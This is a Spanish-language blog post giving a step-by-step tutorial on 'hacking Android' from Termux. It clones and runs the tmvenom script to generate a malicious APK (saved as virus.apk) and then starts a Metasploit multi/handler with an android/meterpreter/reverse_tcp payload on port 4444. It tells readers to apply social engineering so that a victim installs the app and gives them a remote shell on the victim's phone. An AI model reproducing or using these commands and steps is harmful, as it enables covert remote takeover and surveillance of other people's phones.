lunes, 28 de octubre de 2024

HACKING ANDROID: Hackear Android desde TERMUX.

Tmvenom:

<Requisito>
Tener Metasploit instalado en t3rmux
Recomiendo tener Es file Explorer
Procedimiento
1- apt update
2- apt upgrade
3- pkg install pip
4- pkg install git
5- pkg install python2 (Solo en caso de que no lo tengan instalado
6- pkg installl php
7- git clone https://github.com/TechnicalMujeeb/tmvenom
8- cd tmvenom
9- ls (listamos contenido de la carpeta)
10- chmod +x tmvenom.py
11- sh install.sh
12- python2 tmvenom.py
Ok, si hicieron todo bien y tienen Mestasploit instalado en su termux
les va a dejar un menu con 11 opciones ustedes van a elegir la 1 para un
payload en android
-El ataque que vamos a realizar va hacer dento de LAN por lo cual vamos abrir
otra terminal y pondremos el comando
ifconfig
lo cual nos dara nuestra ip la ip la podran encontrar hastra abajo de poner el
comando donde dice
inet add:"SU IP"
O simplemente van a la configuración de su celular, wifi, entrar a la red wifi a la
que están conectados y les aparece la ip.
-Ok, luego vamos a copiar la ip mencionada y nos regresamos a la sesion 1 y
la ponemos
-Despues de ponerla nos pedira un puerto, el script nos recomienda el 4444
Y este es el que vamos a poner
4444
-De ahi nos pedira la ruta donde lo queremos guardar la cual pondremos
/sdcard/"Nombre que le quieran poner al payload ejemplo="
/sdcard/virus.apk
de ahi el script procedera a generar el payload, el payload lo podemos
encontrar en el almacenamiento interno, por lo cual descargamos Es file
explorer
-De ahí nos va a decir si queremos empezar a entrar el modo de escucha lo
cual pondremos una "y"
lo cual nos estara ejecutando Metasploit :)
- Cuando se nos inicie Metasploit pondremos los siguientes comandos
- use multi/handler
- set payload android/meterpreter/reverse_tcp
- set lhost "la ip que pusieron anteriormente que sacaron con el comando
ifconfig"
- set lport 4444
- exploit
- De ahi entrara en modo de escucha y de espera a que alguien ejecute la
aplicacion
ahí ustedes deben de aplicar sus técnicas de ingeniería social para que la
víctima caiga
en mi caso lo are en mi propio celular
- Ok, cuando la persona instale la app y el abra se ejecuta el payload y en la
terminal de termux
y con el comando "help" podremos ver todas las opciones que tenemos,
y listo hemos j4ck3ado un Android.

Espero les guste😁.
en
Etiquetas: , , , , , ,

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)

comandos_basicos_linux.pdf

  Si eres nuevo en Linux y no conoces como trabajar con la terminal, estos 10 comandos te serán muy útiles para dar tus primeros pasos: 1. c...

  • comandos_basicos_linux.pdf
      Si eres nuevo en Linux y no conoces como trabajar con la terminal, estos 10 comandos te serán muy útiles para dar tus primeros pasos: 1. c...
  • HACKING ANDROID: Hackear Android desde TERMUX.
    Tmvenom: <Requisito> Tener Metasploit instalado en t3rmux Recomiendo tener Es file Explorer Procedimiento 1- apt update 2- apt up...
  • presentación
    Hola, me presento; me llamo redjhons, estoy creando este blog con la intención de crear una comunidad de entusiastas por la informática; pro...